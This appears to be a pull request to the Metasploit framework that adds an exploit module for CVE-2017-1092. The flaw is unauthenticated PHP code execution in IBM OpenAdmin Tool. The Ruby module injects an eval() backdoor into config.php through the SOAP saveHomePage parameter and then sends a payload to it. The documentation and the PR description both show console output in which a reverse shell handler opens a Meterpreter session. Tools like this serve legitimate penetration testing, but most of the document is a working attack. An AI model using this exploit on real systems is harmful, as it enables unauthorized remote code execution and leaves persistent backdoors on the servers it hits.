### PR TITLE
Add IBM OpenAdmin Tool SOAP welcomeServer PHP Code Execution module

### DIFF
--- a/documentation/modules/exploit/multi/http/ibm_openadmin_tool_soap_welcomeserver_exec.md
+++ b/documentation/modules/exploit/multi/http/ibm_openadmin_tool_soap_welcomeserver_exec.md
@@ -1,0 +1,55 @@
+## Description
+
+  This module exploits an unauthenticated remote PHP code execution vulnerability in [IBM OpenAdmin Tool](https://www.ibm.com/support/knowledgecenter/SSGU8G_12.1.0/com.ibm.oat.doc/ids_oat.htm) included with IBM Informix versions 11.5, 11.7, and 12.1.
+
+  The *welcomeServer* SOAP service does not properly validate user input in the *new_home_page* parameter of the *saveHomePage* method allowing arbitrary PHP code to be written to the *config.php* file. The *config.php* file is executed in most pages within the application, and accessible directly via the web root, resulting in code execution.
+
+  **Note: If malformed PHP code is written to the *config.php* file the application fails to process subsequent requests to set *new_home_page*, rendering the application unexploitable.**
+
+  For this reason, the module first writes a PHP `eval()` backdoor to the *config.php* file, then the payload is provided as PHP code in a HTTP POST request for execution.
+
+  By default, a backup of the existing *config.php* is written to *BAKconfig.php*. Replacing the *config.php* file with *BAKconfig.php* will remove the backdoor.
+
+
+## Vulnerable Application
+
+  The IBM&reg; OpenAdmin Tool (OAT) for Informix&reg; is a web application for administering and analyzing the performance of IBM Informix database servers. You can administer multiple database server instances from a single OAT installation on a web server. You can access the web server through any browser to administer all your database servers.
+
+  This module has been tested successfully on IBM OpenAdmin Tool 3.14 on Informix 12.10 Developer Edition (SUSE Linux 11) virtual appliance.
+
+  * [Informix 12.10 Developer Edition SLES 11 virtual appliance demo (Developer Edition 32 bit) VMware Workstation](https://www-01.ibm.com/marketing/iwm/iwm/web/reg/download.do?source=swg-informixfpd&S_PKG=dl&lang=en_US&cp=UTF-8&dlmethod=http)
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Do: `exploit/multi/http/ibm_openadmin_tool_soap_welcomeserver_exec`
+  3. Do: `set rhost [IP]`
+  4. Do: `run`
+  5. You should get a session
+
+
+## Scenarios
+
+### IBM OpenAdmin Tool 3.14 on Informix 12.10 Developer Edition (SUSE Linux 11) Virtual Appliance
+
+  ```
+  msf exploit(ibm_openadmin_tool_soap_welcomeserver_exec) > check
+  [*] 172.16.191.208:80 The target service is running, but could not be validated.
+  msf exploit(ibm_openadmin_tool_soap_welcomeserver_exec) > run
+
+  [*] Started reverse TCP handler on 172.16.191.181:4444 
+  [+] 172.16.191.208:80 Wrote backdoor to config.php file successfully
+  [*] Sending stage (33986 bytes) to 172.16.191.208
+  [*] Meterpreter session 1 opened (172.16.191.181:4444 -> 172.16.191.208:39840) at 2017-05-31 08:01:49 -0400
+  [!] 172.16.191.208:80 Replace the 'config.php' file with 'BAKconfig.php' to remove the backdoor
+
+  meterpreter > sysinfo
+  Computer    : informixva
+  OS          : Linux informixva 2.6.27.39-0.3-vmi #1 SMP 2009-11-23 12:57:38 +0100 i686
+  Meterpreter : php/linux
+  meterpreter > getuid 
+  Server username: daemon (2)
+  meterpreter > 
+  ```
+

--- a/modules/exploits/multi/http/ibm_openadmin_tool_soap_welcomeserver_exec.rb
+++ b/modules/exploits/multi/http/ibm_openadmin_tool_soap_welcomeserver_exec.rb
@@ -1,0 +1,116 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include REXML
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'IBM OpenAdmin Tool SOAP welcomeServer PHP Code Execution',
+      'Description'    => %q{
+        This module exploits an unauthenticated remote PHP code execution
+        vulnerability in IBM OpenAdmin Tool included with IBM Informix
+        versions 11.5, 11.7, and 12.1.
+
+        The 'welcomeServer' SOAP service does not properly validate user input
+        in the 'new_home_page' parameter of the 'saveHomePage' method allowing
+        arbitrary PHP code to be written to the config.php file. The config.php
+        file is executed in most pages within the application, and accessible
+        directly via the web root, resulting in code execution.
+
+        This module has been tested successfully on IBM OpenAdmin Tool 3.14
+        on Informix 12.10 Developer Edition (SUSE Linux 11) virtual appliance.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'SecuriTeam', # Discovery and exploit
+          'Brendan Coles <bcoles[at]gmail.com>', # Metasploit
+        ],
+      'References'     =>
+        [
+          ['CVE', '2017-1092'],
+          ['EDB', '42091'],
+          ['URL', 'https://www-01.ibm.com/support/docview.wss?uid=swg22002897'],
+          ['URL', 'https://blogs.securiteam.com/index.php/archives/3210'],
+          ['URL', 'http://seclists.org/fulldisclosure/2017/May/105']
+        ],
+      'Platform'       => 'php',
+      'Arch'           => ARCH_PHP,
+      'Privileged'     => false, # Privileged on Windows but not on *nix targets
+      'Targets'        => [['Generic (PHP Payload)', {}]],
+      'DisclosureDate' => 'May 30 2017',
+      'DefaultTarget'  => 0))
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, 'The base path to IBM OpenAdmin Tool', '/openadmin' ])
+      ]
+    )
+  end
+
+  def set_home_page(homepage)
+    xml = Document.new
+    xml.add_element 'soapenv:Envelope', 'xmlns:xsi'     => 'http://www.w3.org/2001/XMLSchema-instance',
+                                        'xmlns:xsd'     => 'http://www.w3.org/2001/XMLSchema',
+                                        'xmlns:soapenv' => 'http://schemas.xmlsoap.org/soap/envelope/',
+                                        'xmlns:urn'     => 'urn:Welcome'
+    xml.root.add_element 'soapenv:Header'
+    xml.root.add_element 'soapenv:Body'
+    body = xml.root.elements[2]
+    body.add_element 'urn:saveHomePage', 'soapenv:encodingStyle' => 'http://schemas.xmlsoap.org/soap/encoding/'
+    new_home_page = body.elements[1].add_element 'new_home_page', 'xsi:type' => 'xsd:string'
+    new_home_page.text = homepage
+
+    uri = normalize_uri target_uri.path, 'services', 'welcome', 'welcomeService.php'
+    send_request_cgi 'method'  => 'POST',
+                     'uri'     => uri,
+                     'ctype'   => 'text/xml; charset=UTF-8',
+                     'headers' => { 'SOAPAction' => 'urn:QBEAction' },
+                     'data'    => xml.to_s
+  end
+
+  def check
+    fingerprint = Rex::Text.rand_text_alpha(rand(10) + 6)
+    res = set_home_page "\";##{fingerprint}"
+
+    unless res
+      vprint_status "#{peer} Connection failed"
+      return CheckCode::Unknown
+    end
+
+    if res.code == 200 && res.body =~ %r{<ns1:saveHomePageResponse><return xsi:type="xsd:string">";##{fingerprint}</return>}
+      return CheckCode::Detected
+    end
+
+    Msf::Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    cmd_param = Rex::Text.rand_text_alpha(rand(10) + 6)
+
+    res = set_home_page "\";eval($_POST['#{cmd_param}']); #"
+
+    unless res
+      vprint_status "#{peer} Connection failed"
+      return CheckCode::Unknown
+    end
+
+    if res.code == 200 && res.body =~ /<ns1:saveHomePageResponse><return xsi:type="xsd:string">";eval/
+      print_good "#{peer} Wrote backdoor to config.php file successfully"
+    else
+      fail_with Failure::UnexpectedReply, "#{peer} Failed to backdoor config.php"
+    end
+
+    vprint_status "#{peer} Executing payload..."
+    send_request_cgi({ 'method'    => 'POST',
+                       'uri'       => normalize_uri(target_uri.path, 'conf', 'config.php'),
+                       'vars_post' => { cmd_param => payload.encoded } }, 5)
+
+    print_warning "#{peer} Replace the 'config.php' file with 'BAKconfig.php' to remove the backdoor"
+  end
+end


### PR DESCRIPTION
This PR adds an exploit for IBM OpenAdmin Tool.

        This module exploits an unauthenticated remote PHP code execution
        vulnerability in IBM OpenAdmin Tool included with IBM Informix
        versions 11.5, 11.7, and 12.1.

        The 'welcomeServer' SOAP service does not properly validate user input
        in the 'new_home_page' parameter of the 'saveHomePage' method allowing
        arbitrary PHP code to be written to the config.php file. The config.php
        file is executed in most pages within the application, and accessible
        directly via the web root, resulting in code execution.

        This module has been tested successfully on IBM OpenAdmin Tool 3.14
        on Informix 12.10 Developer Edition (SUSE Linux 11) virtual appliance.


## Documentation

To follow; when I feel like it.


## Verification

- [x] Start `msfconsole`
- [x] `use exploit/multi/http/ibm_openadmin_tool_soap_welcomeserver_exec`
- [x] `set rhost <RHOST>`
- [x] `check`
- [x] **Verify** something happens
- [x] `run`
- [x] **Verify** you get a session


### Example Output

```
msf exploit(ibm_openadmin_tool_soap_welcomeserver_exec) > check
[*] 172.16.191.208:80 The target service is running, but could not be validated.
msf exploit(ibm_openadmin_tool_soap_welcomeserver_exec) > run

[*] Started reverse TCP handler on 172.16.191.181:4444 
[+] 172.16.191.208:80 Wrote backdoor to config.php file successfully
[*] Sending stage (33986 bytes) to 172.16.191.208
[*] Meterpreter session 1 opened (172.16.191.181:4444 -> 172.16.191.208:39840) at 2017-05-31 08:01:49 -0400
[!] 172.16.191.208:80 Replace the 'config.php' file with 'BAKconfig.php' to remove the backdoor

meterpreter > sysinfo
Computer    : informixva
OS          : Linux informixva 2.6.27.39-0.3-vmi #1 SMP 2009-11-23 12:57:38 +0100 i686
Meterpreter : php/linux
meterpreter > getuid 
Server username: daemon (2)
meterpreter > 
```


## Installation

* [Informix 12.10 Developer Edition SLES 11 virtual appliance demo (Developer Edition 32 bit) VMware Workstation](https://www-01.ibm.com/marketing/iwm/iwm/web/reg/download.do?source=swg-informixfpd&S_PKG=dl&lang=en_US&cp=UTF-8&dlmethod=http)

